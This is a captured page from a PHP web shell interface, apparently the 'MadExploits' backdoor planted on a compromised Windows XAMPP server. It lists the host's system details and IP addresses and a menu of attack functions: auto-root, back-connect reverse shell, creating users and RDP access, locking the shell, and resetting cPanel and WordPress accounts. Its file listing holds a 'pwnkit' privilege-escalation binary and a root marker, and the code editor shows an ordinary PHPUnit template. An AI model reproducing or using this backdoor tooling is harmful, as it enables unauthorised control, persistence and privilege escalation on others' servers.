Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.124
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
php /
pear /
PHPUnit /
Framework /
Process /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
TestCaseMethod.tpl.dist
1.29
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TestCaseMethod.tpl.dist
<?php ini_set('display_errors', 'stderr'); set_include_path('{include_path}'); if ({composerAutoload}) { require_once {composerAutoload}; define('PHPUNIT_COMPOSER_INSTALL', {composerAutoload}); } else { require 'PHPUnit/Autoload.php'; } ob_start(); function __phpunit_run_isolated_test() { if (!class_exists('{className}')) { require_once '{filename}'; } $result = new PHPUnit_Framework_TestResult; if ({collectCodeCoverageInformation}) { $result->setCodeCoverage(new PHP_CodeCoverage); } $result->strictMode({strict}); $test = new {className}('{methodName}', unserialize('{data}'), '{dataName}'); $test->setDependencyInput(unserialize('{dependencyInput}')); $test->setInIsolation(TRUE); ob_end_clean(); ob_start(); $test->run($result); $output = ob_get_clean(); print serialize( array( 'testResult' => $test->getResult(), 'numAssertions' => $test->getNumAssertions(), 'result' => $result, 'output' => $output ) ); ob_start(); } {constants} {included_files} {globals} if (isset($GLOBALS['__PHPUNIT_BOOTSTRAP'])) { require_once $GLOBALS['__PHPUNIT_BOOTSTRAP']; unset($GLOBALS['__PHPUNIT_BOOTSTRAP']); } __phpunit_run_isolated_test(); ob_end_clean();
Close